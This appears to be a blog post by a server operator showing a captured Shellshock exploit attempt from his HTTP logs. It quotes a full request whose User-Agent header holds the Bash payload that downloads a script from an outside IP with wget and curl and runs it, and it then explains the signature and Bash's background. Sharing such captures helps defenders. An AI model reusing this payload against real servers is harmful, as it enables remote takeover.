shellshock

How a Shellshock exploit attempt looks like

One of my HTTP servers hosted on an Amazon EC2 receives regularly strange requests like these:   One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* “);’ Host: 52.10.211.77 Connection: Close   The IP address in the screen shot is from Austria (http://whois.domaintools.com/212.152.181.211) I received similar requests from the Netherlands, France and UK. Unfortunately, I configured the HTTP server to erase old logs, so I can’t say how many access I got and from which locations. This is a variant of the Shellshock exploit discovered in September last year. How do you know that this is the Shellshock exploit? By seeing this text: User-Agent: () { :;};/usr/bin/perl -e   The Shellshock vulnerabilities affect Bash, a program that various Unix-based systems use to execute command lines and command scripts. It is often installed as the system’s default command-line interface. Bash is free software, developed collaboratively and overseen since 1992 on a volunteer basis by Chet Ramey, a professional software architect. Analysis of the…


%d bloggers like this:

By continuing to use the site, you agree to the use of cookies and to its Privacy Policy more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close